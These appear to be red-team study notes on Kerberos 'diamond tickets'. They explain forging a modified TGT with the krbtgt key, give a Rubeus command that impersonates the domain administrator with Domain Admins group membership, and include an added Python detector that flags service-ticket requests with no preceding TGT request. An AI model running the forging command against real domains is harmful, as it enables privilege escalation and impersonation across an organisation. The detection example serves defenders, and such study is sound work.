# Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT that can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of the domain, and then passed into a logon session for use. Because a domain controller does not keep track of the TGTs it has legitimately issued, it will happily accept any TGT that is encrypted with the domain's krbtgt hash.

Therefore, **a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ**. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ.
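The detection heuristic above, as an added example that is not part of the original notes: correlate Windows Security events 4768 (TGT requested, i.e. the AS-REQ) and 4769 (service ticket requested, i.e. the TGS-REQ) and report 4769 events with no 4768 from the same client within the TGT lifetime. The event layout, timestamps and the 10-hour window are constructed assumptions; the `("client", "account")` keying is an added variant that also requires the TGS-REQ account to match the AS-REQ account, which is the difference a rewritten TGT shows.

```python
# Added example (not from the original page): flag TGS-REQs (4769) that have no
# preceding AS-REQ (4768) from the same client. Events are constructed samples
# modelled loosely on Windows Security log fields, not real log output.
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # assumed default TGT lifetime

# Constructed sample events covering three scenarios.
SAMPLE_EVENTS = [
    # normal logon: AS-REQ then TGS-REQ for the same account and client
    {"time": "2024-05-01T08:00:00", "id": 4768, "account": "jdoe", "client": "10.0.0.5"},
    {"time": "2024-05-01T08:05:00", "id": 4769, "account": "jdoe", "client": "10.0.0.5"},
    # TGS-REQ from a client that never sent an AS-REQ (golden-ticket pattern)
    {"time": "2024-05-01T09:00:00", "id": 4769, "account": "administrator", "client": "10.0.0.9"},
    # AS-REQ for one account, then a TGS-REQ for another account from the same client
    {"time": "2024-05-01T10:00:00", "id": 4768, "account": "jdoe", "client": "10.0.0.7"},
    {"time": "2024-05-01T10:02:00", "id": 4769, "account": "administrator", "client": "10.0.0.7"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def orphan_tgs_requests(events, key=("client",), window=TGT_LIFETIME):
    """Return the 4769 events that have no 4768 event sharing the fields named
    in `key` within `window` before them. key=("client",) is the heuristic from
    the notes; key=("client", "account") also requires the account to match."""
    as_reqs = {}  # key tuple -> list of AS-REQ timestamps
    orphans = []
    for ev in sorted(events, key=_ts):
        k = tuple(ev[f] for f in key)
        if ev["id"] == 4768:
            as_reqs.setdefault(k, []).append(_ts(ev))
        elif ev["id"] == 4769:
            t = _ts(ev)
            recent = [a for a in as_reqs.get(k, []) if timedelta(0) <= t - a <= window]
            if not recent:
                orphans.append(ev)
    return orphans


def orphan_accounts(events, key=("client",)):
    """(client, account) pairs of the orphaned TGS requests, in time order."""
    return [(e["client"], e["account"]) for e in orphan_tgs_requests(events, key)]


if __name__ == "__main__":
    print("keyed on client:         ", orphan_accounts(SAMPLE_EVENTS))
    print("keyed on client+account: ", orphan_accounts(SAMPLE_EVENTS, ("client", "account")))
```

Keyed on client alone, only the 10.0.0.9 request is flagged, which matches the page's point that a rewritten TGT still has a preceding AS-REQ; keying on client and account additionally flags the 10.0.0.7 request because its AS-REQ was for a different account.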

Diamond tickets can be created with Rubeus:

```
Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap
```

* `/tgtdeleg` uses the Kerberos GSS-API to obtain a usable TGT for the current user without needing to know their password, NTLM/AES hash, or elevation on the host.
* `/ticketuser` is the username of the user to impersonate.
* `/ticketuserid` is the domain RID of that user.
* `/groups` lists the desired group RIDs (512 being Domain Admins).
* `/krbkey` is the krbtgt AES256 hash.

Rubeus `describe` will now show that this is a TGT for the target user.

```
Rubeus.exe describe /ticket:doIFYj ...snip... MuSU8=
```

